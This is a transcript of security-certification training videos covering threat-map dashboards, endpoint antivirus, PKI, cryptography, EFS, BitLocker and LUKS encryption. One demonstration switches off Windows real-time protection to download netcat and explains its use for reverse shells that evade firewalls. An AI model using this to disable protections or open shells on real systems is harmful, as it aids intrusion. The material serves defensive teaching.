through email or through instant messaging of some kind. Or an SMS text message to, you know, send money
in escrow for something that you want to buy through Craigslist or something like Kijiji in Canada. Always be
cynical and very careful about what and who you trust online.
[Video description begins] Topic title: Malware Dashboard. The presenter is Dan Lachance. [Video
description ends]
There are many different types of real time dashboards that are used to show you threats related to infections or
denial-of-service or distributed denial-of-service attacks to name just a few.
[Video description begins] A web site labeled "CYBERTHREAT REAL-TIME MAP" opens. It includes tabs
labeled "MAP", "STATISTICS", "DATA SOURCES", and "BUZZ". The MAP tab is selected. It includes a
globe and a legend. The legend includes items labeled "OAS", "ODS", and "IDS". [Video description ends]
Now there are some that are available out on the Internet, such as what we're going to look at here. But of course, this can also be tailored for use within an organization by receiving threat information from intrusion detection and prevention sensors throughout the network and running on hosts, as well as malware threats being detected and sent back to a central location. You can get this kind of insight within a single organization. So here we're looking at the Kaspersky Labs picture of the globe with a number of different threats. And it's kind of neat to look at; you can scroll around and look at different parts of the planet. And the other thing is that you can click on any of these items down here in the legend and remove them from appearing, so you can reduce how much you're looking at.
[Video description begins] In the legend, he unselects few items. [Video description ends]
[Video description begins] He clicks the STATISTICS tab. The corresponding tab opens. It includes a graph
and a legend. The legend includes items labeled "OAS", "ODS", and "IDS". [Video description ends]
If I click STATISTICS, we can see the number of DETECTIONS PER SECOND for each of these items, and we've got a real-time graph. If we hover over IDS, we can see it stands for Intrusion Detection Scan, whereas ODS is On-Demand Scan and OAS is On-Access Scan. So this is retrieving data from a number of data sources related to the Kaspersky anti-malware tool. That's where a lot of this stuff is coming from.
[Video description begins] He clicks the DATA SOURCES tab. The corresponding tab opens. It includes tiles
labeled "OAS - On-Access Scan", "MAV - Mail Anti Virus", and "WAV - Web Anti-Virus". [Video description
ends]
So we have a lot of different things that we can view about these types of threats.
[Video description begins] He switches to the MAP tab. [Video description ends]
Now at the same time, a box has popped up automatically saying that Canada is the 28th
[Video description begins] A pop-up box labeled "CANADA" opens. It includes a link labeled "More
details". [Video description ends]
most attacked country, at least at this point in time. And we can see the number of occurrences for different types of scans, or whether we've got infections through mail anti-virus scanning. We can click More details, and we can actually get a listing of the names of specific problematic malware.
[Video description begins] The STATISTICS tab gets selected. It displays HISTORICAL STATISTICS PER
COUNTRY. The top local infections of last week are displayed in graphical format and tabular form. The table
displays a list of infection and their corresponding percentage. [Video description ends]
For example, if I click one of these HackTool pieces of malware, it will try to find it in the Kaspersky lab's
database to give me a description as to what it's about.
[Video description begins] He clicks an infection labeled "HackTool.MSIL.KMSAuto.dh". A web site labeled
"kaspersky THREATS" opens. A page labeled "HACKTOOL.MSIL.KMSAUTO" is open. [Video description
ends]
So this one is about activating unregistered Microsoft software products. And, if I click on let's say a Trojan
listed here,
[Video description begins] He closes the kaspersky THREATS web site. He switches to the STATISTICS
tab. [Video description ends]
[Video description begins] He clicks an infection labeled "Trojan.Script.Generic". In the kaspersky THREATS
web site, a page labeled "TROJAN.SCRIPT.GENERIC" opens. It includes a world map. [Video description
ends]
So, it doesn't really give me a whole lot of detail, but it does give me a bit of a geographical breakdown on a map of the hotbeds of activity. We can see the legend down here. Red, naturally, has the highest number of occurrences, that is, the percentage of users where that specific Trojan is showing up.
[Video description begins] He closes the kaspersky THREATS web site. He switches to the STATISTICS
tab. [Video description ends]
Now there are many different other web sites like this as well.
[Video description begins] In the browser, he switches to another tab. A web page labeled "Fortinet Threat
Map" is open. It includes a world map and a table. The table has three columns and several rows . The column
headers are ATTACK, SEVERITY, and LOCATION. [Video description ends]
So I've got the Fortinet Threat Map here, where I can kind of see the source and destination of a lot of different
types of attacks, which are flowing by very quickly down below like integer overflow attacks and denial-of-
service attacks.
[Video description begins] He points to the entries in the table. [Video description ends]
I can also go to LookingGlass Cyber, to get another picture of the world on the map, where I can see a lot of
details down below.
[Video description begins] In the browser, he switches to another tab. A web page labeled "THREAT MAP by
LookingGlass" is open. It includes a world map and the corresponding information about INFECTIONS /
SECOND, LIVE ATTACKS, BOTNETS, and COUNTRIES. [Video description ends]
I can see a number of live attacks. Specifically, I can see a lot of where those attacks are coming from. And I
can also see botnet listings. Botnets, remember, are collections of infected hosts that are under singular
malicious user control, such as Sality, Mobile, Conficker, ZeroAccess, and so on. Conficker is a worm type of
malware that's self-propagating. And, if enough of those are under singular control, it constitutes a botnet. We
can also see the percentile listing here for countries where we've got threats, so China, India, Iran, Egypt, and
so on and so forth. So these are quite interesting in that they give us a sense of how much activity on the
Internet is actually malicious and that it's happening all of the time.
[Video description begins] Topic title: Endpoint Security. The presenter is Dan Lachance. [Video description
ends]
Where possible, every computing device should have some kind of anti-malware threat protection.
[Video description begins] The Windows Security window opens. It is divided in two parts. The first part is a
navigation pane. The second part is a content pane. The navigation pane includes options labeled "Home",
"Virus & threat protection", and "Device security". The Virus & threat protection option is selected. The
corresponding page is open in the content pane. It includes sections labeled "Last scan", "Quarantined
threats", and "Virus & threat protection settings". [Video description ends]
Now, that might not be possible with a specialized medical device, but it would be possible with standard
smartphones of any type, tablets, laptops, desktops, servers, whether they're physical or virtual. It's very
important that every device has some kind of threat protection installed and that it's reporting to a central
location. Here in Windows 10, I've got Virus & threat protection settings opened up, so we can see that Real-
time protection is turned On. So not only do we have the option of scheduling scans looking for malicious
threats on the machine, but we can also watch user activity in real-time to detect, for example, if a user is
trying to download something that is infected. As an example, I'm going to try to download netcat.
[Video description begins] A web page labeled "netcat 1.11 for Win32/Win64" opens. It includes a link labeled
"netcat 1.11". [Video description ends]
Netcat is a tool that's often used to set up reverse shells between a victim machine that's reaching out and
contacting an attacker station, where the attacker can issue commands. And because it's being initiated from
the victim machine on the victim network, it defeats a lot of firewall rules that might be put in place. So I'm
going to go ahead and click on the link to download netcat.
[Video description begins] He clicks the netcat 1.11 link. The file explorer window opens. The Downloads
folder is open. It includes a drop-down list box labeled "File name" and a button labeled "Save". In the File
name drop-down list box, an option labeled "netcat-win32-1.11.zip" is selected. [Video description ends]
And I'm just going to go ahead and Save this, and it says Failed - Virus detected. Well, that's because of my
real-time protection that we were just looking at.
[Video description begins] He switches to the Windows Security window. [Video description ends]
Let's go back into our Virus & threat protection settings, and let's turn that Off. Now, you would never
willingly do this in reality.
[Video description begins] In the Real-time protection section, he points to the toggle button. [Video
description ends]
All I'm trying to demonstrate is how malicious users can trick or have scripts that will turn off Virus & threat
protection settings, such as turning off Real-time protection in the background.
[Video description begins] He turns off the toggle button. The User Account Control dialog box opens. He
clicks the Yes button. The User Account Control dialog box closes. [Video description ends]
So now, let's try to download netcat once again, and let's just go ahead and save that.
[Video description begins] He switches to the netcat 1.11 for Win32/Win64 web page. [Video description ends]
This time, it doesn't say a virus was detected; it downloaded with no problems at all.
[Video description begins] He clicks the netcat 1.11 link. The file explorer window opens. The Downloads
folder is open. In the File name drop-down list box, "netcat-win32-1.11.zip" option is selected. [Video
description ends]
So we could open up the zip file here and run the installation.
[Video description begins] He opens the Command Prompt window. The following prompt is displayed: D:\
netcat-1.11>. [Video description ends]
Now, I have run the installation. This is considered malware, not necessarily because it's a virus or some type of infection, but because it is often used for reverse shells, as we've mentioned.
[Video description begins] He executes the following command: dir. The output lists all files and
subdirectories contained in a specific directory. [Video description ends]
So by typing dir, I can now see where I've installed it on drive D; it's listed here, including the executable to actually run netcat, nc.
[Video description begins] He switches to the Windows Security window. [Video description ends]
Now, if I actually have Real-time protection on, even though it's already here, it should detect any attempt to run it, and it should quarantine or remove it, depending on my anti-malware settings on this device.
[Video description begins] In the Real-time protection section, he turns on the toggle button.
[Video description begins] The User Account Control dialog box opens. He clicks the Yes button. The User
Account Control dialog box closes. [Video description ends]
[Video description begins] He switches to the Command Prompt window. In the output, he points to
nc.exe. [Video description ends]
[Video description begins] He executes the following command: nc. The window prompts: Cmd line:. [Video
description ends]
So I'm going to go ahead and try to run that executable. Maybe we'll give it a command line; I'll just give it some kind of IP address and a fake port number that I want it to connect to. When we run a tool that is known to be malicious in some way and then look at our threat history, we'll see that we have a quarantined threat.
[Video description begins] He switches to the Windows Security window. [Video description ends]
This one is listed as being HackTool:Win32/NetCat, it's got a High severity rating.
[Video description begins] He points to the Quarantined threats section. [Video description ends]
So I'm going to go ahead and choose remove to get rid of that threat.
[Video description begins] He clicks the Remove all button. The User Account Control dialog box opens. He
clicks the Yes button. The User Account Control dialog box closes. The HackTool:Win32/NetCat threat gets
removed. [Video description ends]
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined how to protect users' sensitive information from social engineering scams, as well as how to protect assets from malware. We did this by exploring different malware types and various forms of social engineering and their related security risks. We looked at authentic email phishing messages and talked about how social engineering attacks are, or can be, executed using the Social Engineering Toolkit, or SET.
We talked about the danger of ransomware and how to mitigate this threat. We talked about how malware and
botnets have become black market commodities, and the proliferation of botnets under malicious user control.
We talked about how to configure a reverse shell, how to use the Malzilla tool to explore malicious web pages.
We took a look at a GUI malware dashboard, and finally, we looked at how to configure malware settings on
an endpoint device. In our next course, we're going to move on to explore the use of cryptography, or crypto,
for protecting IT systems and data, including talking about public key infrastructure, PKI, talking about
encryption, and talking about hashing.
Table of Contents
Objectives
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+ certification exam is designed for IT professionals looking to gain security analyst skills: to perform data analysis; to identify vulnerabilities, threats, and risks to an organization; to configure and use threat detection tools; and to secure and protect an organization's applications and systems. Cryptography is designed to protect data at rest and in transit.
In this course, you'll learn about PKI hierarchy, how cryptography protects sensitive data, and how to protect data at rest using EFS and BitLocker, as well as on Linux and in cloud storage. In addition, you'll examine hashing, including how to generate file hashes for Windows and Linux.
Finally, you'll learn about using SSL and TLS to secure network traffic, cloud CA deployment, and certificate issuance. This course can be used in preparation for the CompTIA Cybersecurity Analyst (CySA+) certification exam CS0-002.
Upon completion of this video, you will be able to list the components of a PKI hierarchy.
Objectives
[Video description begins] Topic title: PKI Hierarchy. The presenter is Dan Lachance. [Video description
ends]
Using PKI, or Public Key Infrastructure, is a great way to secure things like network communications and data
at rest. PKI is a hierarchy of digital security certificates, and the certificates get issued and managed by what
are called Certificate Authorities, or CAs. You can have a private CA, where you install and control and
configure it entirely within the organization, or you can use the services of a public CA that is trusted
internationally. The benefit of which is that any certificates from the public CA will be trusted by all devices.
With private CA certificates, in order for, say, a company smartphone to trust a private CA certificate for an internal website, the mobile device has to be configured to trust the private CA. It won't be automatic. The PKI hierarchy begins at the top with the root certificate authority, or root CA. Now, the root
CA can be used to issue certificates. But in a larger enterprise, what happens is the root CA is used to generate
subordinate CAs, maybe for different regions, different countries, different business units, different projects,
whatever the case might be. And each subordinate CA in turn issues and controls its own PKI certificates,
whether those certificates are for users, devices, or software entities. So with PKI, the issuing certificate
authority digitally signs the certificates that it issues with its private key. Either way, whether you have a root CA issuing certificates directly or a root CA with subordinate CAs, the root CA should be kept offline whenever possible. This is because if a root CA gets compromised, all certificates at every subordinate level are compromised. If a subordinate CA is compromised, not that that's a good thing, but only the certificates issued under that part of the hierarchy would then be compromised.
So a PKI certificate, then, is issued by a CA, a certificate authority, to a user, device, or software entity for the purpose of security. Whether that be encryption for confidentiality, or integrity, so that we can be
assured data hasn't been tampered with or corrupted. Or whether it's for authentication, so that we know, for
example, an email message truly came from who it says it came from. Now the PKI certificate itself is a file,
but it can also be written into other devices like smart cards.
And the certificate can contain many things like, the X.509 version number, X.509 is the PKI standard, the
signature of the CA, the signature algorithm used by the CA. Every certificate has a serial number, and it's
stored in the certificate itself, along with the date the certificate was issued and when it expires. Because after
the expiry it can no longer be used. The intended use of the certificate, whether it's for encrypting file system
entries or for digitally signing email messages. The subject name would be the entity to which the certificate
applies. So for a website, it would be the URL of the website, or it could be the email address of a user, that
type of thing. Also, a public and private key pair is generated that is unique for this entity. And the keys will be
stored in the certificate. Now, there are ways that you can export just the public key part of the certificate if
you wanted to share that with others. For example, if they need something so that they can encrypt email
messages they want to send to you. You don't want to give them the private key, just the public, which is used
to encrypt.
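As a quick illustration, assuming you have a certificate exported to a PEM file (the file name here is hypothetical), OpenSSL can dump most of these fields for inspection:

# Show the version, serial number, signature algorithm, validity dates,
# subject name, public key, and intended key usage of a certificate
openssl x509 -in mycert.pem -noout -text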
[Video description begins] Public and Private Keys. [Video description ends]
So then we've got public and private key pairs. Now, the public key can be shared publicly, and that's why it's
called that and there's no security risk with doing this. Now when you encrypt a mail message to somebody,
you need the recipient's public key. You also use a public key to verify a digitally signed message. Now
private keys, as you might guess, need to be kept private and must be available only to the key owner. They can also be embedded in smart cards. You use private keys to read encrypted messages, so encrypted messages get decrypted
using this key, or to create a digital signature. Digital signatures are used so that the recipient can rest assured
the message really does come from who it says it came from.
[Video description begins] Topic title: Cryptography. The presenter is Dan Lachance. [Video description
ends]
Cryptography has been used in one way or another for centuries, actually for millennia, for thousands and
thousands of years. And really, the overall purpose of cryptography or crypto hasn't changed. It's all about data
security. Cryptography provides confidentiality, integrity, and source authentication. Of course, in our modern
age, we're talking about how that's done at the digital level with security solutions.
Integrity and authentication are a core part of trusting data, whether it's a file on disk, a row in a table within a database, or a piece of network communication. Now, one way to do integrity and authentication is through file hashing. File hashing lets us detect whether a file has been changed in any way, or confirm that it hasn't been, for example so we know it wasn't corrupted when we downloaded it over the Internet. As an example, integrity and authentication also have everything to do with email digital signatures. If you want to digitally sign an important email message that you're sending to a colleague so they can be assured it really came from you, you do that using your private key. Normally, in a mail program, it's just a button, or it might be turned on by default to sign the message, but in the background it's using your private key to create a hash, encrypt it, and send it off. The recipient then needs your public key to verify the validity of that digital signature. Integrity and authentication can also be used to establish trust when a VPN tunnel comes online. And it's also used in blockchain for cryptocurrencies. Confidentiality means encryption.
And so that could mean the encryption of email messages, files on the disk, or entire disk volumes. We can
also use crypto for confidentiality to protect what's being sent through a VPN network tunnel.
So encryption starts by acquiring an encryption key. Next, the key and the plain text that we want to protect are
sent into an encryption algorithm. In other words, a large complex mathematical formula. The encrypted result
is called ciphertext. And you have to possess the correct key in order to decrypt the message, which results in the original plain text that existed before it was fed into the encryption algorithm with the key.
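As a rough illustration of that flow, and not something demonstrated in this course, here's how you might encrypt and then decrypt a file with a passphrase-derived key using OpenSSL; the file names are hypothetical:

# Feed the plain text and a key derived from a passphrase into the AES-256 algorithm
openssl enc -aes-256-cbc -pbkdf2 -in plain.txt -out cipher.bin

# Only someone with the correct passphrase can turn the ciphertext back into the original plain text
openssl enc -d -aes-256-cbc -pbkdf2 -in cipher.bin -out decrypted.txt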
[Video description begins] Topic title: Encrypting File System. The presenter is Dan Lachance. [Video
description ends]
Encrypting File System, or EFS, is built into most Windows versions or editions and allows the encryption of
individual files or folders on an NTFS volume. The items get encrypted for the user that's currently logged in.
But if you're using an edition of Windows, let's say Windows 10 Home, forget it, EFS is not available.
[Video description begins] The File Explorer window is open, in which the New Volume (D:) drive is open. It
contains a folder labeled "Budgets". [Video description ends]
So here, I've got Windows Server 2019 Datacenter Edition and I'm in the Windows Explorer tool where I've
got a disk volume Drive D.
[Video description begins] He right-clicks the New Volume (D:) drive and a shortcut menu opens. It includes
an option labeled "Properties". [Video description ends]
And if I right-click on it and check out its Properties, indeed, we can see it's been formatted with the NTFS file system.
[Video description begins] He selects the Properties option and its corresponding dialog box opens. [Video
description ends]
Now I do have the option of right clicking on a folder or an individual file and going into the Properties here in
the GUI and under Advanced choosing to encrypt the contents to secure data.
[Video description begins] He clicks a button labeled "Cancel" and the dialog box closes. [Video description
ends]
Now if that's grayed out, it's probably because you don't have an NTFS volume.
[Video description begins] He opens the Budgets folder, which includes a file labeled "Budget2". He then
right-clicks the Budget2 file and a shortcut menu opens. It includes an option labeled "Properties". He selects
the Properties option and a dialog box called "Budget2 Properties" opens. [Video description ends]
But we can also encrypt and decrypt at the command line level.
[Video description begins] He clicks a button labeled "Advanced" and a dialog box labeled "Advanced
Attributes" opens. He then points to a checkbox labeled "Encrypt contents to secure data". [Video description
ends]
[Video description begins] He closes the Advanced Attributes and Budget2 Properties dialog boxes. [Video
description ends]
So here's drive D, we can see there's the Budgets folder, and we can see what's in the Budgets folder.
[Video description begins] He opens a window called "Administrator: Command Prompt". The prompt "D:\>"
is displayed. [Video description ends]
[Video description begins] He executes the following command: dir. The output displays a list of folders in
drive D. It contains a folder labeled "Budgets". The prompt does not change. [Video description ends]
I'm going to start by just running cipher with no parameters, it'll pick up the current location of drive D.
[Video description begins] He executes the following command: dir Budgets. The output displays a list of files
in the Budgets folder. The prompt does not change. [Video description ends]
[Video description begins] He executes the following command: cls and the screen clears. He then executes
the following command: cipher. The output reads "Listing D:\ New files added to this directory will not be
encrypted. U Budgets". The prompt does not change. [Video description ends]
If I go into the Budgets folder and do the exact same thing, just run the cipher with no parameters,
[Video description begins] He executes the following command: cd Budgets. No output returns and the prompt
changes to "D:\Budgets>". He then executes the following command: cipher. The output displays a list of
files. [Video description ends]
new files added to this directory will not be encrypted. And currently the four files here are flagged with a U, which means they are unencrypted. Okay, well, let's change this up a little bit. There are a couple of ways we could do this. We're going to do it here in the command line; I'm going to use
[Video description begins] He executes the following command: cd. No output returns and the prompt does not
change. He then executes the following command: cd /. No output returns and the prompt changes to "D:\
>". [Video description ends]
cipher /e for encrypt; as you might guess, /d would be for decrypting. I'm going to tell it I want to encrypt the Budgets folder, and it says,
[Video description begins] He executes the following command: cls and the screen clears. He then executes
the following command: cipher /e Budgets. The output displays that the Budgets folder is encrypted. [Video
description ends]
Encrypting files in D:\Budgets, okay, looks good. Well, let's change directory into Budgets. Let's just run cipher by itself once again.
[Video description begins] He executes the following command: cd Budgets. No output returns and the prompt
changes to "D:\Budgets>". He then executes the following command: cipher. The output displays a list of
files. [Video description ends]
And notice this time it says new files added to this directory will be encrypted. Now, the other thing we have to bear in mind, though, is that we didn't tell it to recursively encrypt everything in and under the Budgets folder. So we still have those four files in there that are not encrypted. Well, that's interesting.
[Video description begins] In the output, he points to the files. [Video description ends]
So if we were to use notepad, let's say to make a new file, and let's save it in the Budgets folder and see what
happens.
[Video description begins] He executes the following command: notepad. No output returns and the prompt
does not change. The Notepad window opens. He enters the text, "new file". [Video description ends]
[Video description begins] He selects the File menu and then selects the Save As menu option. The File
Explorer window opens. [Video description ends]
It's going to go in the Budgets folder. Why don't we just call it Budget5. Now, if I do a listing here in the Budgets folder, it's with dir, since this is Windows.
[Video description begins] He executes the following command: cls and the screen clears. He executes the
following command: ls. No output returns and the prompt does not change. He then executes the following
command: dir. The output displays a list of files in the Budgets folder. [Video description ends]
We've got Budgets 1 through 5. But if we run cipher, we'll see whether or not they're encrypted; notice Budget5 has an E because it is encrypted. So if I were to run cipher /e *.*, it says four files were encrypted. But how do we verify that?
[Video description begins] He executes the following command: cipher. The output displays a list of files. He
executes the following command: cipher /e *.*. The output displays that four files were encrypted. The prompt
does not change. [Video description ends]
Okay, let's take a look. Now, indeed, we can see that those files are all encrypted.
[Video description begins] He executes the following command: cls and the screen clears. [Video description
ends]
[Video description begins] He executes the following command: notepad Budget1.txt. No output returns and
the prompt does not change. A file called "Budget1” opens in the Notepad window, which contains the text,
"Sample Data". [Video description ends]
If I open one of them with Notepad, it just opens; it decrypts transparently, because I'm logged in with the same user account that was used for encryption. Other users who might try to access that file when logged in with their own account, for example if this is a shared workstation in a work environment, will get an access denied message when they try to open any of these files.
[Video description begins] He points to the files in the output. [Video description ends]
Because they are encrypted with my current user account, and with whoami, of course, I can see exactly who that is.
[Video description begins] He executes the following command: whoami. The output reads "ec2amaz-e5m0ctt\
administrator". The prompt does not change. [Video description ends]
In this video, find out how to protect data at rest using BitLocker.
Objectives
[Video description begins] Topic title: BitLocker Encryption. The presenter is Dan Lachance. [Video
description ends]
In some Windows client and server operating system editions, BitLocker is available to encrypt at the disk
volume level. Now it's designed to work in conjunction with TPM, or Trusted Platform Module hardware built
into the BIOS of your machine. But it doesn't have to; we can work without it as well. So to get started here in Windows Server 2019, if I go to the Start menu and type in bit, I have the Manage BitLocker option from the Control Panel. Now, when I click on that to launch it, I get nothing. The reason is that the component has not been installed. It's available; it's just not there yet. So I'm going to go into my Server Manager here in Windows Server 2019.
[Video description begins] He selects an option called "Server Manager" under a section called “Windows
Server” in the Start menu and a window called "Server Manager" opens. [Video description ends]
[Video description begins] A wizard labeled "Add Roles and Features Wizard" opens. It is divided into two
parts. The first part includes some steps and the second part is a content pane. A step called "Before You
Begin" is selected in the first part and its corresponding page is open in the content pane. [Video description
ends]
This isn't the only way to add that component, but I do want to add it, and I can do it here in the GUI. I'm going to go through and accept all the defaults for the current host.
[Video description begins] He clicks a button labeled "Next". The next step called "Installation Type" is
selected in the first part and its corresponding page is open in the content pane. He then clicks the Next
button. The next step called "Server Selection" is selected in the first part and its corresponding page is open
in the content pane. He then clicks the Next button. The next step called "Server Roles" is selected in the first
part and its corresponding page is open in the content pane. [Video description ends]
And I'm interested not in roles but rather in features and you'll see that BitLocker Drive Encryption is listed
here.
[Video description begins] He clicks the Next button. The next step called "Features" is selected in the first
part and its corresponding page is open in the content pane. The page includes a section labeled "Features",
which includes several options. [Video description ends]
So I'm going to click Add Features for the admin tools required to administer that as well.
[Video description begins] He selects an option labeled "BitLocker Drive Encryption" and its corresponding
dialog box opens. [Video description ends]
[Video description begins] The dialog box closes. An option labeled “Enhanced Storage” gets selected in the
Features section. [Video description ends]
I'm going to go ahead and click Next to install that Windows Server 2019 feature.
[Video description begins] The next step called "Confirmation" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
Here, I'm then told that a restart is pending on this host.
[Video description begins] He clicks a button labeled "Install". The next step called "Results" is selected in the
first part and its corresponding page is open in the content pane. [Video description ends]
So I'm going to go ahead and close out and I'm going to restart it now.
[Video description begins] He clicks a button labeled "Close" and the wizard closes. He then closes the Server
Manager window. [Video description ends]
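As an aside, the same feature can be added without the GUI. Here's a one-line PowerShell sketch, assuming a server edition where the Install-WindowsFeature cmdlet is available:

# Install BitLocker plus its management tools, then restart to finish the installation
Install-WindowsFeature BitLocker -IncludeAllSubFeature -IncludeManagementTools -Restart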
Okay, so now that I have rebooted, BitLocker is available; it's an option. And so if I go, let's say, into a command prompt and start issuing commands like manage-bde (BitLocker Drive Encryption) -status, we'll get the status of what's going on.
[Video description begins] He opens a window called "Administrator: Command Prompt". The prompt "C:\
Users\Administrator>" is displayed. He executes the following command: manage-bde -status. The output
displays information of the D drive. [Video description ends]
So it says disk volumes that can be protected with BitLocker Drive Encryption drive D. So that's interesting.
We've got a second disk drive here that isn't yet encrypted, but we can enable BitLocker on it.
[Video description begins] He executes the following command: exit. No output returns and the window
closes. [Video description ends]
So I'm going to go to my Start menu and type in bit, and notice that the Manage BitLocker icon is now not grayed out but rather available, because the component is installed.
[Video description begins] He selects an option labeled "Manage BitLocker" and a window called "BitLocker
Drive Encryption" opens. [Video description ends]
[Video description begins] He points to a link called "Turn on BitLocker". [Video description ends]
[Video description begins] He clicks a link called "New Volume (D:) BitLocker off". [Video description ends]
And the same thing is true here for drive D. I can click on the link to expand it, and I have the option of turning
on BitLocker for drive D.
[Video description begins] He clicks the Turn on BitLocker link and its corresponding wizard opens. A page
called "Choose how you want to unlock this drive" is open in the wizard. [Video description ends]
It then asks me how I would like to unlock this drive: use a password or a smart card.
[Video description begins] He points to checkboxes labeled "Use a password to unlock the drive" and "Use my
smart card to unlock the drive". [Video description ends]
Now I'm going to use a password, so I'm going to go ahead and enter and reenter the password. And then we'll
go ahead and click Next.
[Video description begins] He selects a checkbox labeled "Use a password to unlock the drive", and two text
boxes labeled "Enter your password" and "Reenter your password" appears below the checkbox. [Video
description ends]
Now it says, how do you want to back up your recovery key? This is going to be important if the password is forgotten. We can print it or save it to a file.
[Video description begins] A page called "How do you want to back up your recovery key?" opens in the
wizard. [Video description ends]
[Video description begins] A dialog box labeled "Save BitLocker recovery key as" opens. [Video description
ends]
We're just going to store this on drive C for now, but of course that's useless if the whole machine is encrypted or there's a problem accessing the contents of the drives. So it really should be backed up somewhere safe. Now, it says you can't save it in the root directory of a non-removable drive.
[Video description begins] He clicks a button labeled "Save" and an error message appears. [Video
description ends]
So it's got a built-in checker to make sure that we are saving this in the proper location.
[Video description begins] He clicks a button labeled "OK" and the error message closes. He then closes the
dialog box. [Video description ends]
So in this case, I'm going to choose Print the recovery key. We'll print to PDF. I'll store this, let's say on drive
D.
[Video description begins] The corresponding dialog box opens. He clicks a button labeled "Print". The File
Explorer window opens. [Video description ends]
I'll call it Key. So I'll go ahead and click Save. And now we can go ahead and click Next.
[Video description begins] In the wizard, a page called "Choose how much of your drive to encrypt"
opens. [Video description ends]
So at this point, it says, how much of your drive do you want to encrypt? Used disk space only or the entire drive? Well, technically, there's nothing on that drive yet. It's a brand new disk volume that's been added to this host. So I'm going to use Encrypt used disk space only, as it recommends; it's faster and best for new PCs and new drives. Fine, no problem.
[Video description begins] A page called "Choose which encryption mode to use" opens. [Video description
ends]
Next, I'm going to leave it in compatibility mode for the encryption mode to use.
[Video description begins] He clicks the Next button. A page called "Are you ready to encrypt this device?"
opens. [Video description ends]
So now, how big the drive is, how much data is on it, and which option we choose for encryption will determine how long this takes. But we can see that it looks like it's happened already. We no longer have the option to Turn on BitLocker to protect data at rest on drive D. Instead, we have options such as backing up the recovery key, changing the password, adding a smart card, or even turning off BitLocker. So if we were to go back to the command prompt, let's do that again, cmd, and issue the command we were issuing in here previously, which was manage-bde -status.
[Video description begins] He opens the Administrator: Command Prompt window. The prompt "C:\Users\
Administrator>" is displayed. [Video description ends]
We can now see from the Conversion Status that used space only is encrypted and that we're using AES 128-bit encryption.
[Video description begins] He executes the following command: manage-bde -status. The output displays
information of the D drive. [Video description ends]
Protection is now on. But of course, while the machine is up and running, the volume is not locked down. In other words, it's Unlocked.
[Video description begins] He points to the text, "Lock Status: Unlocked". [Video description ends]
So if you had a malware infection on this host, BitLocker doesn't really help with anything, because once the machine is up and running and that volume is unlocked, it's as if it's not even encrypted. So the protection here is at the disk or volume level. If someone were to steal the disk out of the machine while it had no power and try to put it in their own machine, they wouldn't be able to access it.
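For reference, the same BitLocker operations can be scripted with manage-bde. This is a sketch of typical usage rather than exactly what was clicked through in the GUI, so confirm the switches with manage-bde -? on your system.

rem Show BitLocker status for all volumes
manage-bde -status

rem Turn on BitLocker for drive D with a password protector, encrypting used space only
manage-bde -on D: -password -usedspaceonly

rem Lock the data volume, then unlock it again with the password
manage-bde -lock D:
manage-bde -unlock D: -password

rem Turn BitLocker off, which decrypts the volume
manage-bde -off D: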
During this video, you will learn how to protect data at rest on a Linux system.
Objectives
[Video description begins] Topic title: Linux Filesystem Encryption. The presenter is Dan Lachance. [Video
description ends]
The protection of data at rest, in other words, data confidentiality normally through encryption is sometimes
mandated for regulatory compliance. And there are many ways that this can be done in Linux.
[Video description begins] A command prompt window called "dlachance@kali: ~" is open. The prompt
"root@kali:~#" is displayed. [Video description ends]
So let's start here in Linux by running fdisk -l to list devices.
[Video description begins] He executes the following command: fdisk -l. The output displays a list of devices
and their information. The prompt does not change. [Video description ends]
So the first device is /dev/sda, and it's been carved up into a number of partitions. We can see that with the
numbers after the reference to /dev/sda.
[Video description begins] In the output, he points to "/dev/sda1", "/dev/sda2", and "/dev/sda5". [Video
description ends]
We've also got a device here called /dev/sdb. This one we're going to enable encryption for. So this is an entire
disk device that we're going to carve up into one volume and it's going to be encrypted. So what I want to do
then is first make sure I have the appropriate tools installed to make this happen.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
Your distribution of Linux determines how you check for the most up-to-date version of the package. Here in Kali Linux, I'm going to run apt-get and tell it what to install, something called cryptsetup. Now, if I've already got it, it'll tell me it's already there.
[Video description begins] He executes the following command: apt-get install cryptsetup. The output displays
that the cryptsetup package is installed with the newest version. [Video description ends]
And in this case, it's telling me I already have the newest version. Well, that's good news. I want to make sure I have the most up-to-date software for this to work. So the next thing I'm going to do is run cryptsetup. And I'm going to tell it I want to use luksFormat, notice the capital F there. LUKS, L-U-K-S, stands for Linux Unified Key Setup. It's a style of encryption for Linux storage devices. The -y means I'll be asked to verify the passphrase, and -v is for verbose. Now, I also have to tell it the device I want this applied against. So the last parameter is going to be /dev/sdb, as per our fdisk -l command output.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. He then executes the following command: cryptsetup -y -v luksFormat /dev/sdb. The output displays a
warning, which reads “This will overwrite data on /dev/sdb irrevocably" and the window prompts "Are you
sure? (Type uppercase yes):". [Video description ends]
Are you sure? Type uppercase yes, okay, I'll type in uppercase YES.
[Video description begins] The window prompts "Enter passphrase for /dev/sdb:". [Video description ends]
[Video description begins] A text displays, which reads "Key slot 0 created". The prompt "root@kali:~#" is
displayed. [Video description ends]
Okay, the next thing I'm going to do is run cryptsetup again, and I'm going to specify luksOpen, which opens a LUKS-encrypted device. I'm going to specify /dev/sdb, and I'm going to make a reference here to an encrypted volume that I'm calling archive1; it could be called anything I want it to be called.
[Video description begins] He executes the following command: cryptsetup luksOpen /dev/sdb archive1. The
window prompts "Enter passphrase for /dev/sdb:". [Video description ends]
So of course, it prompts me for the passphrase that was entered earlier. So I'm going to go ahead and enter that.
[Video description begins] The prompt "root@kali:~#" is displayed. [Video description ends]
All right, let's see what's going on here. So I'm going to type cryptsetup -v, for verbose, status; in this case, I want the status of archive1, okay.
[Video description begins] He executes the following command: cryptsetup -v status archive1. The output
displays the status of archive1 and its information. [Video description ends]
So it's a LUKS2 type of encrypted volume, aes plain64, 512 bits is the key size, the device is /dev/sdb. Okay, this looks good.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
